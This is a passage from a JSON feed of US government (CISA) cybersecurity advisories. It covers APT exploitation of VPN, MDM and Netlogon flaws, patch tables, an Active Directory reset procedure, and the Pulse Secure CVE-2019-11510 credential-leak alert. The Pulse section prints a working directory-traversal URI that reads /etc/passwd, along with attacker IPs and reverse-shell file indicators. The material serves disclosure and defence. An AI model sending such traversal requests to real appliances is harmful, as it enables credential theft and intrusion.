Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&amp;CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:43:42", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies _[[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> \"Proxy\" )\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as` ../../../data `(see figure 6). \n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\n\nCISA also recommends organizations to:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nTo report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA\u2019s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\n**References**\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"XMPPwocky\" )\n\n[[4] OpenSecurity 